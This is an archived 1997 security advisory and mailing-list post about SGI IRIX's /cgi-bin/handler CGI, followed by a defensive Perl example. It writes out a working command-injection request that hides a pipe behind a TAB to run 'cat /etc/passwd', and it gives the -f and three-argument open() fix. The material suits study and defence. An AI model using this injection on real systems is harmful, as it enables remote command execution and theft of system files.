IRIX fails to correctly patch /cgi-bin/handler exploit
Description: In an apparent attempt to prevent break-ins through the common handler CGI technique, IRIX changed the code. They now check the end of a string for a pipe (trying to make sure perl opens the file as a plain file), but you can still get away with putting tabs after the pipe, to hide it.
Author: Razvan Dragomirescu <drazvan@kappa.ro>
Compromise: remotely run commands through this pathetic CGI
Vulnerable Systems: IRIX 6.3 and 6.4; the older versions are vulnerable to an even easier version of the same problem.
Date: 19 June 1997
Date: Thu, 19 Jun 1997 23:06:13 +0300
From: Razvan Dragomirescu <drazvan@kappa.ro>
To: best-of-security@suburbia.net
Subject: BoS: /cgi-bin/handler - more notes
Hi,
I have had reports that my exploit for SGI's /cgi-bin/handler does not
work on IRIX 6.3 (on O2). I analyzed the code provided with IRIX
6.3 and they tried to fix it, but they actually DID NOT.
They added a new line to the script:
$doc=~s/\|*$// (in plain English, this means "remove any number of '|'s at
end-of-string"). But guess what. It works just as well if you put another
TAB character after the "pipe" (so that the "pipe" is not at
end-of-string, the TAB is).
The exploit should read
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0
It tricks the script into executing the command anyway.
Now, for those of you who want to patch it somehow, here's the best
solution that has been posted to me (all credits for it go to Wolfram
Schneider <wosch@apfel.de>)
All "open" commands should check if the their argument is really a
filename. You could use:
-f $doc && open (INPUT, $doc)
(Same thing as: if (-f $doc) { open (INPUT, $doc) }; the one written
above is more Perl style.)
I'm waiting to hear from you (my thanks to Lamont Grandquist who pointed
out the problem on IRIX 6.3).
So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
Anyone on IRIX 6.4? :) (What does it run on BTW?)
Be good.
Razvan
-------------------------------------------------------------------------------
Razvan Dragomirescu
Organization: KappaNet
E-Mail: drazvan@kappa.ro, drazvan@romania.ro
Alternate E-mail: drazvan@iname.com, drazvan@guv.ro, drazvan@pub.ro, drazvan@lbi.ro
Phone: +40-1-6866621
NIC-HANDLE: RD1604
RIPE-HANDLE: RD38-RIPE
NO CARRIER
"Smile, tomorrow will be worse" (Murphy)
-------------------------------------------------------------------------------
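The filter bypass and the -f check discussed in the post above, as an added Perl example that is not part of Razvan's message or of SGI's handler script. The $doc values are constructed, and the script only classifies them; it never passes a tainted name to a two-argument open().

```perl
#!/usr/bin/perl
# Added example: why the IRIX 6.3 change to handler is bypassable, and how
# the "-f" test plus a three-argument open() closes the hole.
use strict;
use warnings;

# The IRIX 6.3 "fix": strip a run of '|' at end-of-string, nothing else.
sub irix63_filter {
    my ($doc) = @_;
    $doc =~ s/\|*$//;
    return $doc;
}

# Perl's two-argument open() discards trailing whitespace and then treats a
# trailing '|' as "run the rest as a command". This mirrors that rule so a
# name can be classified without ever calling open() on it.
sub two_arg_open_would_pipe {
    my ($doc) = @_;
    $doc =~ s/\s+$//;
    return $doc =~ /\|$/ ? 1 : 0;
}

# Wolfram Schneider's mitigation: open only names that are existing plain
# files, and use three-argument open so '|' can never select a pipe.
sub safe_open {
    my ($doc) = @_;
    return undef unless -f $doc;
    open(my $fh, '<', $doc) or return undef;
    return $fh;
}

sub show { my $s = shift; $s =~ s/\t/\\t/g; return "'$s'" }

# Constructed inputs: this script itself (a real file), the original exploit
# string, and the TAB variant that survives the IRIX 6.3 filter.
my @samples = ($0, "whatever;cat /etc/passwd|", "whatever;cat /etc/passwd|\t");
for my $doc (@samples) {
    my $filtered = irix63_filter($doc);
    printf "%-32s after filter %-32s pipe=%d  -f=%d  safe_open=%s\n",
        show($doc), show($filtered),
        two_arg_open_would_pipe($filtered), (-f $filtered ? 1 : 0),
        (defined safe_open($filtered) ? "opened" : "refused");
}
```

Only the TAB variant still ends in a pipe after the filter, and the -f test refuses both exploit strings while admitting the real file.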
This page is part of Fyodor's exploit world.